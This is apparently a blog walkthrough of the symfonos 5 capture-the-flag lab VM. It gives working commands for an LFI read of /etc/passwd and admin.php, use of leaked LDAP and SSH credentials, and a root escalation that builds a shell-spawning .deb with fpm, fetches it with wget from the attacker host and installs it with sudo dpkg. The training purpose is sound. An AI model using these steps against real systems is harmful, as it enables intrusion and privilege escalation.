symfonos 5 walkthrough Vulhub CTF

Today we are solving Vulhub CTF

symfonos VM is made by Zayotic. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. symfonos 5 walkthrough

It is of Beginner real-life based and is very handy in order to brush up your skills as a penetration tester.

Network Scanning

identifies the target IP address we will initiate with netdiscover.

netdiscover
symfonos 5 walkthrough

advance network scanning using the Nmap Aggressive scan. All port and services.

We see the target system port 21 ssh, 80 HTTP, 389 LDAP, service is running.

symfonos 5 walkthrough

we got the port 80 open, we decided to open the IP address in the web browser.

symfonos 5 walkthrough

I am adding our target VM IP Address our /etc/hosts file symfonos.server

vi /etc/hosts
symfonos 5 walkthrough
Directory Bruteforcing

we chose DIRB for directory brute force attack finding server all directory

symfonos 5 walkthrough

After brute-forcing the directory we see a admin.php directory now open the directory any web browser

I am using firefox and I see the simple login page I tried password brute burp suite but no correct credential found i try to open home directory but the home page is redirecting admin page

http://symfonos.server/admin.php
symfonos 5 walkthrough

I try to open home page source code Using curl tool get the target home page source code

we see the home.php URL is redirecting localhost php file

curl http://symfonos.server/home.php
symfonos 5 walkthrough
Try LFI with curl tool

We see the target passwd mean target is vulnerable LFI

curl http://symfonos.server/home.php?url=etc/passwd
symfonos 5 walkthrough

Try reading source code admin.php file

curl http://symfonos.server/home.php?url=admin.php

we got an LDAP username and password

 $bind = ldap_bind($ldap_ch, "cn=admin,dc=symfonos,dc=local", "qMDdyZh3cT6eeAWD");

I run the Nmap script to login with username and password

 nmap --script ldap-search --script-args 'ldap.username="cn=admin,dc=symfonos,dc=local",ldap.password="qMDdyZh3cT6eeAWD"' 192.168.0.104 -p389
symfonos 5 walkthrough

try to log in the credentials ssh connection

userPassword: cetkKf4wCuHC9FET
mail: [email protected]

  • username: zeus
  • password: cetkKf4wCuHC9FET
ssh [email protected]
id
symfonos 5 walkthrough

Privilege Escalation

run sudo -l to check for commands that can run as sudo. It looks like dpkg can run as sudo.

sudo -l
symfonos 5 walkthrough
symfonos 5 walkthrough

So after rummaging the internet, we find out some information about building packages with fpm

TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
symfonos 5 walkthrough

After generating dpkg file download the target /tmp directory I star our Simple python server and wget to download the file target system

cd /tmp
wget http://192.168.0.103:99/x_1.0_all.deb
symfonos 5 walkthrough

I run the dpkg package and our shell is changed normal user to root user

sudo dpkg -i x_1.0_all.deb
id
cd /root
cat proof.txt
symfonos 5 walkthrough
Next Walkthrough Os-hackNos-4 Walkthrough see here

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →